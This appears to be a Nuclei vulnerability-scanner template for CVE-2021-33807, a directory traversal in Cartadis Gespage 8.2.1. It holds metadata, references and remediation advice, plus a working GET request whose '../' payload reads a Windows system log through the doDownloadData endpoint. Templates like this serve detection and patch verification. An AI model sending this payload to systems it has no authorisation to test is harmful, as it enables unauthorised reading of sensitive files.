52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: CVE-2021-33807
|
|
|
|
info:
|
|
name: Cartadis Gespage 8.2.1 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.
|
|
remediation: |
|
|
Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.
|
|
reference:
|
|
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
|
|
- https://www.gespage.com/cartadis-db/
|
|
- https://www.cartadis.com/gespage-website/
|
|
- https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-33807
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02481
|
|
epss-percentile: 0.9007
|
|
cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: gespage
|
|
product: gespage
|
|
tags: cve2021,cve,lfi,gespage
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "NetpDoDomainJoin:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/octet-stream"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220422b7249efee552751068637592f33a59d0dc7fb1a142d2b029df7fb29dff78b022100d24ab853d986ecf1b4d3f370e664cbb373bdbae73195d2c12837ccd95bd26fe4:922c64590222798bb761d5b6d8e72950 |